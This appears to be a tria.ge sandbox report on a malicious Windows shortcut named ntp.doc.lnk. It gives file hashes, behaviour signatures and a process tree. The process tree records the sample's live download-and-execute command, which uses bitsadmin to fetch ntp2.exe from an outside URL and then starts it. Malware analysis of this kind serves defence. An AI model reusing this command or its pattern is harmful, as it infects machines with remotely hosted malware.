Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
120s -
max time network
130s -
platform
windows7_x64 -
resource
win7-20230831-en -
resource tags
arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system -
submitted
11/10/2023, 11:12
Static task
static1
Behavioral task
behavioral1
Sample
ntp.docm
Resource
win7-20230831-en
Behavioral task
behavioral2
Sample
ntp.docm
Resource
win10v2004-20230915-en
Behavioral task
behavioral3
Sample
ntp.doc.lnk
Resource
win7-20230831-en
Behavioral task
behavioral4
Sample
ntp.doc.lnk
Resource
win10v2004-20230915-en
General
-
Target
ntp.doc.lnk
-
Size
2KB
-
MD5
10a485b8c65306f6e992e68ab96bd6b6
-
SHA1
3537832558906a95d1669ff8ec37b1016805ec88
-
SHA256
93ef3ba4b4896b56850ef0a5f894155c163fe6d86fd5a70134b38ee1a7e2447a
-
SHA512
713cfd75c6e5ae3945ac4498c85190bdd1c41e89fd74f6b2eb16fddf6fc85befcf8e1be37fc134ca56fc0501d72d7a745872f02a8ed4a5c470b4b4cc1a62eb01
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Download via BitsAdmin 1 TTPs 1 IoCs
pid Process 2616 bitsadmin.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 2416 wrote to memory of 2572 2416 cmd.exe 29 PID 2416 wrote to memory of 2572 2416 cmd.exe 29 PID 2416 wrote to memory of 2572 2416 cmd.exe 29 PID 2572 wrote to memory of 2616 2572 cmd.exe 30 PID 2572 wrote to memory of 2616 2572 cmd.exe 30 PID 2572 wrote to memory of 2616 2572 cmd.exe 30
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\ntp.doc.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:2416 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C bitsadmin /transfer Update /download /priority FOREGROUND https://recipemedical.com/archive/ntp2.exe C:\Users\Admin\AppData\Local\Temp\ntp2.exe' & start C:\Users\Admin\AppData\Local\Temp\ntp2.exe'2⤵
- Suspicious use of WriteProcessMemory
PID:2572 -
C:\Windows\system32\bitsadmin.exebitsadmin /transfer Update /download /priority FOREGROUND https://recipemedical.com/archive/ntp2.exe C:\Users\Admin\AppData\Local\Temp\ntp2.exe'3⤵
- Download via BitsAdmin
PID:2616
-
-